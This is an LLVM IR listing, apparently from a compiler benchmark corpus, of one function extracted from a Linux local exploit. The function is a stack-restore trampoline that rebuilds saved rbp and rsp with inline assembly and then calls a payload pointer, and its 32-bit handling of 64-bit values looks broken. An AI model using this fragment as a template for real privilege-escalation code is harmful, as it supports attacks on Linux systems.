; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_45553.c_wrapper.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_45553.c_wrapper.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@saved_rbp_hi = common dso_local global i32 0, align 4
@saved_rbp_lo = common dso_local global i32 0, align 4
@restored_rbp = common dso_local global i32 0, align 4
@saved_esp = common dso_local global i32 0, align 4
@restored_rsp = common dso_local global i32 0, align 4
@payload = common dso_local global i32 0, align 4
@llvm.used = appending global [1 x i8*] [i8* bitcast (void ()* @wrapper to i8*)], section "llvm.metadata"

; Function Attrs: noinline nounwind optnone uwtable
define internal void @wrapper() #0 {
  %1 = alloca i32, align 4
  call void asm sideeffect "userland_entry:", "~{dirflag},~{fpsr},~{flags}"() #1, !srcloc !2
  %2 = load i32, i32* @saved_rbp_hi, align 4
  %3 = shl i32 %2, 32
  %4 = load i32, i32* @saved_rbp_lo, align 4
  %5 = or i32 %3, %4
  store i32 %5, i32* @restored_rbp, align 4
  %6 = load i32, i32* @saved_rbp_hi, align 4
  %7 = shl i32 %6, 32
  %8 = load i32, i32* @saved_esp, align 4
  %9 = or i32 %7, %8
  store i32 %9, i32* @restored_rsp, align 4
  call void asm sideeffect "movq $0, %rax\0Amovq %rax, %rbp\0A", "*m,~{dirflag},~{fpsr},~{flags}"(i32* @restored_rbp) #1, !srcloc !3
  call void asm sideeffect "movq $0, %rax\0Amovq %rax, %rsp\0A", "*m,~{dirflag},~{fpsr},~{flags}"(i32* @restored_rsp) #1, !srcloc !4
  store i32 ptrtoint (i32* @payload to i32), i32* %1, align 4
  call void asm sideeffect "movq $0, %rax\0Acall *%rax\0A", "*m,~{dirflag},~{fpsr},~{flags}"(i32* %1) #1, !srcloc !5
  call void asm sideeffect "movq $$5555, %rax\0A", "~{dirflag},~{fpsr},~{flags}"() #1, !srcloc !6
  call void asm sideeffect "ret", "~{dirflag},~{fpsr},~{flags}"() #1, !srcloc !7
  ret void
}


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
!2 = !{i32 372}
!3 = !{i32 528, i32 568}
!4 = !{i32 654, i32 694}
!5 = !{i32 818, i32 858}
!6 = !{i32 930}
!7 = !{i32 1000}
